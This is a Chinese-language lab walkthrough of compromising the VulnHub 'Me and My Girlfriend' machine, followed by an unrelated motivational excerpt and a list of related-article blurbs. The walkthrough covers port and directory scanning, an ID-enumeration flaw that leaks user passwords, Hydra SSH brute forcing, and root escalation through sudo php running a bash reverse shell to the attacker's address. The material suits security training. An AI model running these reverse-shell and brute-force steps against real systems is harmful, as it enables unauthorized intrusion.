文章目录

  • 靶机地址环境
  • 实验操作
    • 0x01拓扑图
    • 0x02 信息收集
    • 0x03漏洞发现
    • 0x04 提权
  • 摘抄

靶机地址环境

https://www.vulnhub.com/entry/me-and-my-girlfriend-1,409/

实验操作

0x01拓扑图

0x02 信息收集

第一步 扫描,发现主机

netdiscover 基于arp扫描存活主机
nmap

第二步 发现端口

nmap -p- -A 192.168.0.107

第三步 扫描目录

使用工具GitHub上的dirsearch(https://github.com/maurosoria/dirsearch/releases/tag/v0.4.2)python3 dirsearch.py -u http://192.168.0.107/ -e*[09:51:40] 301 -  314B  - /config  ->  http://192.168.0.107/config/
[09:51:40] 200 -  942B  - /config/
[09:51:48] 200 -  120B  - /index.php
[09:51:48] 200 -  120B  - /index.php/login/
[09:51:52] 301 -  312B  - /misc  ->  http://192.168.0.107/misc/
[09:52:00] 200 -   32B  - /robots.txt


第四步 发现路径,并分析(未发现异常)

http://192.168.0.107/misc/
http://192.168.0.107/config/
http://192.168.0.107/robots.txt



第五步 配置数据包,更改请求数据头
可以burpsuit添加字段,或者浏览器插件

第六步 再次访问,发现新的页面

0x03漏洞发现

第一步 发现可疑点
1、通过访问,发现登陆和注册的地方,存在和数据库交付,怀疑存在注入漏洞
2、同时发现目录是拼接的,可能存在目录遍历或者文件包含漏洞

(https://blog.csdn.net/qq_41901122/article/details/104602082?ops_request_misc=%257B%2522request%255Fid%2522%253A%2522165322902116781435449002%2522%252C%2522scm%2522%253A%252220140713.130102334.pc%255Fblog.%2522%257D&request_id=165322902116781435449002&biz_id=0&utm_medium=distribute.pc_search_result.none-task-blog-2~blog~first_rank_ecpm_v1~rank_v31_ecpm-1-104602082-null-null.nonecase&utm_term=%E6%96%87%E4%BB%B6%E5%8C%85%E5%90%AB&spm=1018.2226.3001.4450)

3、注册的地方,任意用户注册漏洞

http://192.168.0.107/?page=login
http://192.168.0.107/?page=register


第二步 任意用户注册成功,并且登陆进入系统

第三步 越权去遍历用户
在查看个人信息的地方,发现时通过id来查看,所以思路是通过id的遍历,去发现去他用户的用户和密码信息

请求数据包

返回数据包

通过对返回数据包的长度进行排序,发现
返回1418长度的是空值,即ID不存在的
返回值大于1418的,为存在的用户
eweuhtandingan-skuyatuh
sedihaingmah-cedihhihihi
aingmaung-qwerty!!!
abdikasepak-dorrrrr
sundatea-indONEsia
alice-4lic3
test-test

第四步 对第三步的结果继续利用
通过对第三步的账号密码进行依次登陆,发现页面没有异常
回到最初,服务器还开放了22的端口
想到使用ssh的方式去遍历用户名和密码

user.txt
-----------------
eweuhtandingan
sedihaingmah
aingmaung
abdikasepak
sundatea
alice
test
-----------------
pass.txt
-----------------
skuyatuh
cedihhihihi
qwerty!!!
dorrrrr
indONEsia
4lic3
test
-----------------

hydra -L /root/Desktop/use.txt -P /root/Desktop/pass.txt ssh://192.168.0.107

第五步 ssh连接成功

ssh alice@192.168.0.107
4lic3

0x04 提权

第一步 进行提权脚本的检测
先在本地开启一个服务,服务器进行文件传输
python2 -m SimpleHTTPServer

上传一个脚本(一般情况下,/tmp下具有执行权限),使用脚本进行检测

wget http://192.168.0.110:8000/LinEnum.sh chmod +x LinEnum.sh 添加执行权限或者添加777权限./LinEnum.sh
-----------------------------------------------
[+] We can sudo without supplying a password!
Matching Defaults entries for alice on gfriEND:env_reset, mail_badpass, secure_path=/usr/local/sbin\:/usr/local/bin\:/usr/sbin\:/usr/bin\:/sbin\:/bin\:/snap/binUser alice may run the following commands on gfriEND:(root) NOPASSWD: /usr/bin/php[+] Possible sudo pwnage!
/usr/bin/php
-----------------------------------------------


第二步 sudo提权
根据上一步的提示,这个alice可以不用密码的情况下执行PHP语言,思路:
执行PHP脚本(内容是反弹shell脚本,添加执行/bin/bash的权限)
1、服务器端-执行脚本

alice@gfriEND:~$ cat  nc.php
<?php
exec("/bin/bash -c 'bash -i >& /dev/tcp/192.168.0.110/4444 0>&1'");
?>
alice@gfriEND:~$ chmod +x nc.php
alice@gfriEND:~$ sudo php nc.php

2、kali端-监听shell

└─# nc -lvvp 4444
listening on [any] 4444 ...
connect to [192.168.0.110] from bogon [192.168.0.108] 46232
root@gfriEND:~# whoami
whoami
root
root@gfriEND:~# id
id
uid=0(root) gid=0(root) groups=0(root)

第三步 获取falg

cd /root
ls
cat flag4.txt
------------------------------------------------------------------------------
Contact me if you want to contribute / give me feedback / share your writeup!
Twitter: @makegreatagain_
Instagram: @aldodimas73Thanks! Flag 2: gfriEND{56fbeef560930e77ff984b644fde66e7}
------------------------------------------------------------------------------

摘抄


大家的生活和工作都很忙碌,有时稍不注意,就容易忘记一些事。

这时,无论是用笔还是手机,最好记下待办的事项、设置好提醒。

亲人的生日,可以定一个提醒;重要的会议,可以定一个提醒;没来得及回复的信息,也可以定一个提醒。

把看似微不足道的每一件小事都放在心上,注重细节,你才会成为一个更靠谱、更优秀的人。

---《设置提醒》


CISP-PTE靶机练习(me-and-my-girlfriend)相关推荐

  1. 信息安全从业人员认证证书一览表

    北京谷安天下科技有限公司(以下简称"GooAnn")是业内处于领先地位,是业内处于领先地位,致力于 IT 风险管理.IT内部控制.信息系统审计.IT 治理.信息安全管理.IT服务管 ...

  2. CISP-PTE和CISAW认证的区别有哪些?

    货比三家,找到更合适的价格,同样也找到更优质的物品.随着时代的迅猛发展,各有千秋的证书也让人们挑花了眼,如何在琳琅满目的认证之中选择出最适合自己的,就需要根据个人的发展情况来说. 从事于信息渗透行业的 ...

  3. Vulnhub靶机渗透之Me and My Girlfriend

    本专栏是笔者的网络安全学习笔记,一面分享,同时作为笔记 前文链接 WAMP/DVWA/sqli-labs 搭建 burpsuite工具抓包及Intruder暴力破解的使用 目录扫描,请求重发,漏洞扫描 ...

  4. vulnhub靶机ME AND MY GIRLFRIEND: 1

    靶机下载地址:https://www.vulnhub.com/entry/me-and-my-girlfriend-1,409/ 靶机ip:192.168.70.158 kali ip:192.168 ...

  5. 如何从零开始学习CISP-PTE呢?

    CISP-PTE(Certified Information Security Professional - Penetration Testing Engineer)是一项涉及网络安全.渗透测试等领 ...

  6. CISP-PTE、CISP、CISSP之间的区别

    CISP-PTE认证培训发出以后,好多信息安全职场人.学生在纠结学CISP还是学CISSP,还是学PTE,这里给大家就CISP.CISSP.CISP-PTE介绍一下! CISSP 国际注册信息安全专家 ...

  7. 爱思考一文读懂CISP

    CISP-PTE和CISP-IRE是两个不向的.PTE是渗透测试工程证,IRE是应急响应工程师认证,是中国信息安全测评中心发证,含金量都很高,深受企业认可,也成为信息安全从业者必备证书.而这两个证书在 ...

  8. NISP和CISP信息安全相关证书有哪些?都代表什么|NISP管理中心

    国家注册信息安全专业人员分为几类 1.NISP(校园版CISP)1级.2级.3级 2.CISP.CISP-PTE.CISP-PTS 下面对着几类证书从工作领域.含金量.水平程度等进行简单介绍 一.NI ...

  9. Moonraker:1靶机入侵

    0x01 前言 攻击Moonraker系统并且找出存在最大的威胁漏洞,通过最大威胁漏洞攻击目标靶机系统并进行提权获取系统中root目录下的flag信息. Moonraker: 1镜像下载地址: htt ...

  10. Vulnhub靶机:ME AND MY GIRLFRIEND_ 1

    目录 介绍 信息收集 主机发现 主机信息探测 网站探测 sql注入-失败 水平越权-成功 获取到所有账号密码 SSH爆破 SSH登录 Flag1 提权拿到Flag2 方法1:php命令执行 方法2:p ...

最新文章

  1. 为何Redis要比Memcached好用(转)
  2. 提高你30%的设计效率的PPT快捷键
  3. java分布式api网管关,分布式04-Spring Cloud Zuul Api网关 一
  4. 【Tools】WireShark3.2安装教程详解
  5. 【洛谷P1538】迎春舞会之数字舞蹈
  6. 【ROS-rviz】发布一个图像结果 topic
  7. mysql 触发器 注意事项_MySQL触发器的利弊-使用MySQL触发器时应该注意的事项
  8. C和汇编混合编程--------函数调用后ebp、esp值问题
  9. 机械系统计算机控制试卷及答案,机械系统设计试题及答案
  10. 2018年最佳Linux服务器发行版
  11. Mac安装Python我觉得靠谱的方法
  12. 浅谈12306核心模型设计思路和架构设计阅读心得
  13. mysql认证考试_MySQL 8 OCP(1Z0-908)认证考试题库原题(第12题)
  14. 考虑一个包含n个元素的普通二叉最小堆数据结构,它支持最坏情况时间代价为O(lgn)的操作INSERT和EXTRACT-MIN。请给出一个势函数Φ,使得INSERT的平摊代价为O(lgn),EXTRAC
  15. nyoj 366 D的小L(数的全排)
  16. 2.3 zio入门——一些常见的zio操作符
  17. k8s查找所有pod_k8s---pod常用操作
  18. 持NPDP证书在深圳可享受子女入学、医疗保健、安居保障等福利
  19. 成语学习记录20180820-26
  20. Ta-lib学习笔记02--K线模式识别

热门文章

  1. 鸿蒙系统会碎片化吗,鸿蒙系统讲解决安卓碎片化问题,4G流畅度媲美12G!
  2. iOS开发 NSPredicate的使用方法
  3. 打造前端 Deepin Linux 工作环境——安装最新版本的火狐firefox浏览器
  4. 【论文写作】Latex在线创作工具overleaf及账号注册办法
  5. yocto(一)——yocto介绍
  6. 【Python】如何判断丑数
  7. 基于Pytorch的cifar10分类网络模型
  8. 8600 系列 VSM 用于磁性微型机器人以及韦根线研究
  9. 【一起入门NLP】中科院自然语言处理期末考试*总复习*:考前押题+考后题目回忆
  10. iOS - 监控键盘高度、屏蔽字符、限制字符个数